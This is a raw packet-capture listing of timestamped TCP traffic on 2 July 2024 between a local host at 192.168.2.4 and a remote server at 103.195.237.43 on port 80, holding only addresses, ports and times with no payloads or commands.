Jul 2, 2024 07:47:57.078645945 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.078659058 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.078820944 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.078836918 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.078866959 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.078880072 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.078989029 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.079036951 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.079163074 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.079207897 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.079246998 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.079262972 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.079294920 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.079305887 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.079472065 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.079488039 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.079518080 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.079530001 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.080133915 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.080180883 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.080233097 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.080248117 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.080280066 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.080296993 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.168998957 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.169050932 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.323345900 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.323363066 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.323379040 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.323437929 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.323440075 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.323491096 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.323533058 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.323548079 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.323579073 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.323604107 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.323851109 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.323910952 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.324034929 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.324086905 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.324129105 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.324174881 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.324203014 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.324218035 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.324248075 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.324260950 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.324539900 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.324590921 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.324667931 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.324683905 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.324717999 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.324737072 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.324812889 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.324830055 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.324846029 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.324909925 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.324959993 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.325525999 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.325577974 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.325603008 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.325618029 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.325650930 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.325663090 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.325819969 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.325870037 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.567676067 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.567712069 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.567776918 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.567776918 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.567897081 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.567982912 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.568000078 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.568017006 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.568166971 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.568197012 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.568237066 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.568267107 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.568326950 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.568387032 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.568403006 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.568417072 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.568445921 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.568645954 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.568698883 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.568712950 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.568727970 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.568772078 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.568772078 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.569020033 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.569138050 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.569152117 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.569185972 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.569222927 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.569391966 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.569406986 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.569421053 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.569436073 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.569463015 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.569576979 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.569955111 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.570040941 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.570055962 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.570070982 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.570208073 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.570247889 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.570262909 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.570343018 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.570343018 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.812737942 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.812777042 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.812789917 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.812882900 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.812925100 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.812939882 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.812954903 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.812969923 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.812982082 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.813218117 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.813286066 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.813457966 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.813474894 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.813525915 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.813527107 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.813616037 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.813631058 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.813690901 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.813690901 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.813750982 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.813894033 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.813909054 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.814013004 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.814115047 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.814131021 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.814145088 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.814161062 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.814172029 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.814189911 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.814591885 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.814611912 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.814623117 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.814661980 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.814661980 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.814707041 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.814847946 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.814872026 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.814886093 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.814929962 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.814929962 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.815120935 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.815135956 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.815157890 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.815171957 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.815198898 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.815233946 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.815630913 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.815648079 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.815713882 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.815713882 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.815752029 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.815767050 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.815782070 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.815795898 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.815828085 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.815828085 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.816148996 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.816164970 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.816179991 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.816195011 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.816207886 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.816211939 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:57.816243887 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:57.816268921 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.057507992 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.057543039 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.057568073 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.057640076 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.057640076 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.057744026 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.057760000 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.057965040 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.057979107 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.057993889 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.058007956 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.058022976 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.058023930 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.058034897 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.058056116 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.058515072 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.058531046 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.058543921 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.058552027 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.058559895 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.058567047 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.058567047 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.058995008 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.059029102 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.059101105 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.059214115 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.059238911 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.059251070 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.059267044 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.059292078 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.059611082 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.059626102 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.059643984 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.059647083 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.059659958 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.059669971 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.059676886 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.059691906 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.059700966 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.059714079 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.060276031 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.060292006 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.060306072 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.060306072 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.060323000 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.060333014 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.060338020 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.060357094 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.060367107 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.060374022 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.060379028 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.060429096 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.060429096 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.060976982 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.060992002 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.061007023 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.061265945 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.061292887 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.061388016 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.061403990 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.061417103 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.061431885 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.061439037 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.061448097 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.061460018 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.061465025 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.061480045 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.061489105 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.061506033 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.062014103 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.062242031 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.062258005 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.066014051 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.303911924 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.304039955 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.304054976 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.304060936 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.304178953 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.304194927 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.304213047 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.304218054 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.304234982 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.304251909 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.304558039 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.304573059 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.304586887 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.304589033 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.304611921 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.304613113 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.304639101 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.304964066 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.304980040 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.304995060 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.305007935 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.305119991 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.305135965 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.305150986 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.305344105 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.305373907 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.305377960 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.305393934 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.305408955 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.305419922 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.305423975 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.305443048 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.305864096 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.305896997 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.305996895 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.306060076 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.306075096 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.306087971 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.306102037 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.306106091 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.306123018 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.306126118 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.306138992 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.306153059 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.306153059 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.306154966 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.306170940 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.306183100 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.306222916 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.306222916 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.306993008 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.307009935 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.307023048 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.307035923 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.307040930 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.307068110 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.307168007 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.307317019 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.307332039 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.307346106 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.307360888 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.307414055 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.307414055 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.307802916 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.307817936 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.307832003 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.307854891 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.307868004 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.307882071 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.307883024 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.307897091 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.307908058 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.307913065 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.307923079 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.307959080 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.307959080 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.308722973 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.308738947 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.308753014 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.308767080 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.308780909 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.308794975 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.308794975 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.308809996 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.308821917 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.308825970 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.308840990 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.308875084 CEST	49738	80	192.168.2.4	103.195.237.43
